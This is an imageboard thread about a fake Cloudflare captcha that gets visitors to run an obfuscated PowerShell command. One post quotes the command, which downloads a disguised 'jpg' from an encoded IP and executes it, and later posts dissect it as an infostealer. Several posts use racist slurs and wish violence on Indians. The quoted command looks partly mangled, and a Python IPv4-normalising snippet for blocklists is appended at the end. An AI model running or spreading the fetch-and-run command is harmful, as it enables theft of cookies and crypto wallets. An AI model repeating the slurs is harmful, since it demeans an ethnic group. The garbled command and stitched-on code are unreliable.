It's sort of clever honestly.
Pajeet ingenuity
>>106805073
so what does the expression do? delete system32
>>106805073kek jeetswhen we finally fix h1b and deport the ones that lied about credentials (and all the chain migrations they sponsored) those fuckers will probably be pretty good scammersmight have to geo-restrict most services harder
>>106805093
I have no clue; I've never used PowerShell. Likely something to do with the website.
>>106805073
>>106805093
>>106805118
Somebody decode the base64 please, I'm lazy.
powershell $WkhsT1VrbFITV2RKZW10b1NWVDkdoSIZFVnFTWHBWYUVsVWEycEhOZVRSVFhWVmExWjNZa1ZHYWxirm "OX4D.5492705/x.jpg' |Invoke-Expression;$WkhsT1VrbFITV2RKZW10bExWjNZa1ZHYWxK
>>106805137
I suppose that semi-explains all of this going on when I reload the site. Also, here's the site I found the amazing captcha from.
>https://thehealthycompulsive.com/archetypal-jung/gratification/
>>106805073may Jagannath crush every street shitting poopjeet
there's quite a lot of videos going over this and dissecting the PowerShell script it runs
https://www.youtube.com/watch?v=1tB5USD004w
tl;dw: it's basically an infostealer that sends browser cookies/crypto wallets to someone running a C&C server
>>106805137
the one I found was curling some PowerShell script to execute. They spam the latest news: when the latest shooter's name drops, suddenly the top Google results throw this fake Cloudflare captcha at you. Pretty impressive.
>>106805073
>first step: open run command
surely to God people whose info is worth stealing aren't THIS stupid, right?
>>106805694
most people don't know what Win+R does lol
>>106805137
neither of the strings is valid
>>106806017
I think these $-prefixed strings are just there to obscure the actual payload, which is embedded in the middle of the command (irm | invoke-expression). I'm no PowerShell expert, but those look like references to nonexistent variables, effectively making them no-ops.
>>106805093
would be funny if it was actually just a captcha
>>106806315
>irm | invoke-expression
So it uses Invoke-RestMethod to download a "JPG" from an obfuscated IP address and then runs it as a command. The IP is 4D in hex followed by the last 3 bytes of the IP encoded as an integer.
>>106806403
insane that there are still applications that accept any form of IPv4 addresses other than 4 dot-separated decimals
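The legacy address forms the last two posts describe (hex octets, a trailing integer that fills the remaining bytes, octal parts, or a single 32-bit integer) are what classic inet_aton accepts. Below is an added example, not code from the thread, that normalises such forms to dotted-decimal so a blocklist or log search keyed on plain IPs still matches; the sample command line and all addresses in it are constructed placeholders.

```python
import re
from typing import Optional

# Parse an IPv4 string under the permissive legacy inet_aton rules: 1 to 4
# dot-separated parts, each decimal, 0x-hex or 0-prefixed octal; the last
# part fills every remaining byte. Returns dotted-decimal, or None if the
# text is not an address under those rules.
def legacy_ipv4_to_dotted(text: str) -> Optional[str]:
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
            values.append(int(p[2:], 16))
        elif re.fullmatch(r"0[0-7]*", p):      # "0" alone is octal zero
            values.append(int(p, 8))
        elif re.fullmatch(r"[1-9][0-9]*", p):
            values.append(int(p, 10))
        else:
            return None
    *lead, last = values
    if any(v > 255 for v in lead):           # leading parts are single bytes
        return None
    if last >= 256 ** (4 - len(lead)):       # last part spans the rest
        return None
    packed = sum(v << (8 * (3 - i)) for i, v in enumerate(lead)) + last
    return ".".join(str((packed >> s) & 0xFF) for s in (24, 16, 8, 0))

# Candidate host tokens: 2 to 4 dotted parts of decimal or hex. Requiring a
# dot keeps bare numbers such as port values out of the results.
HOST_RE = re.compile(
    r"(?i)(?<![\w.])((?:0x[0-9a-f]+|\d+)(?:\.(?:0x[0-9a-f]+|\d+)){1,3})(?![\w.])"
)

# Return (as written, dotted-decimal) pairs for every host token in a captured
# command line whose normalised form differs from how it was written.
def normalise_hosts(command: str) -> list:
    found = []
    for m in HOST_RE.finditer(command):
        raw = m.group(1)
        dotted = legacy_ipv4_to_dotted(raw)
        if dotted and dotted != raw:
            found.append((raw, dotted))
    return found

# Constructed sample in the shape of the pasted command (placeholder host).
SAMPLE = "irm 'http://0x7F.1/x.jpg' | iex"
```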